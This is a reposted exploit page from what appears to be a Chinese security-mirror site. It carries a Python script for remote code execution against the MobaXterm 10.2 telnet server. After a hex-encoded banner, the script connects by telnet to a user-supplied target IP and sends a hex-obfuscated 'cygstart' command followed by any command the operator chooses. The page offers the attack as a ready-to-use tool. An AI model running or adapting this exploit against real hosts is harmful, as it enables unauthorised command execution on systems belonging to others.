|
MobaXtrem 10.2 Remote Code Execution
|
|
来源:https://www.facebook.com/pentest3 作者:albalawi 发布时间:2017-05-17
|
|
'''
# Exploit Title: [MobaXtrem 10.2 telnet Server Remote Code Execution]
# Date: [15/5/2017]
# Exploit Author: [Sultan Albalawi]
# Software Link: [http://download.mobatek.net/10220170312132617/MobaXterm_Portable_v10.2.zip]
# Version: [10.2 ]
# Tested on: [win7]
# CVE : [n/n]
# video: https://www.facebook.com/pentest3/videos/vb.100012552940568/300691130359316/?type=2&theater
'''
import telnetlib
print "\x27\x27\x27\x0d\x0a\x20\x20\x20\x20\x20" \
"\x20\x20\x5c\x20\x20\x20\x2d\x20\x20\x2d\x20" \
"\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e" \
"\x20\x20\x2d\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d" \
"\x20\x2d\x20\x20\x2d\x20\x2d\x20\x20\x2d\x20" \
"\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a" \
"\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74" \
"\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \
"\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a" \
"\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
"\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20" \
"\x60\x2e\x20\x20\x20\x20\x2c\x3b\x27\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70" \
"\x50\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x58\x20" \
"\x2f\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20" \
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" \
"\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
"\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f" \
"\x60\x20\x60\x20\x28\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x0d\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x20" \
"\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x64" \
"\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20\x20" \
"\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74" \
"\x79\x60\x20\x20\x27\x20\x30\x20\x20\x30\x20" \
"\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a" \
"\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20" \
"\x20\x20\x20\x20\x7c\x0d\x0a\x20\x20\x20\x20" \
"\x2c\x20\x20\x20\x20\x20\x20\x20\x2c\x20\x20" \
"\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \
"\x2a\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20" \
"\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20" \
"\x20\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20" \
"\x20\x60\x2e\x5f\x2e\x27\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d" \
"\x5e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60\x20" \
"\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d" \
"\x2d\x2c\x2e\x2e\x5f\x3b\x2d\x2d\x2d\x3e\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20" \
"\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f" \
"\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a" \
"\x20\x20\x27\x20\x60\x20\x20\x20\x20\x2c\x20" \
"\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65" \
"\x77\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20" \
"\x20\x20\x60\x2e\x5f\x20\x2c\x20\x20\x27\x20" \
"\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x7c" \
"\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x3b\x20\x2c\x27\x27\x2d\x2c\x3b\x27\x20\x60" \
"\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f" \
"\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x60\x60" \
"\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d\x2d\x60\x20" \
"\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20" \
"\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x27\x2e\x20\x5f\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f" \
"\x5f\x5f\x20\x7c\x5f\x20\x20\x49\x50\x53\x20" \
"\x20\x20\x20\x20\x29\x0d\x0a\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20" \
"\x20\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \
"\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x53\x75\x6c\x74\x61\x6e\x20" \
"\x41\x6c\x62\x61\x6c\x61\x77\x69\x0d\x0a\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x68\x74\x74\x70\x73" \
"\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65" \
"\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65" \
"\x6e\x74\x65\x73\x74\x33\x0d\x0a\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61" \
"\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e" \
"\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e" \
"\x63\x6f\x6d\x0d\x0a\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \
"\x0a\x27\x27\x27"
HOST = raw_input("target ip :")
tn = telnetlib.Telnet(HOST)
cmo=raw_input('code exection: ')# code execution |calc.exe or Anything you want <../../../>
bg="\x63\x79\x67\x73\x74\x61\x72\x74"
tn.write(bg+" ./"+cmo+"\n")
tn.write("exit\n")
tn.read_all()
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
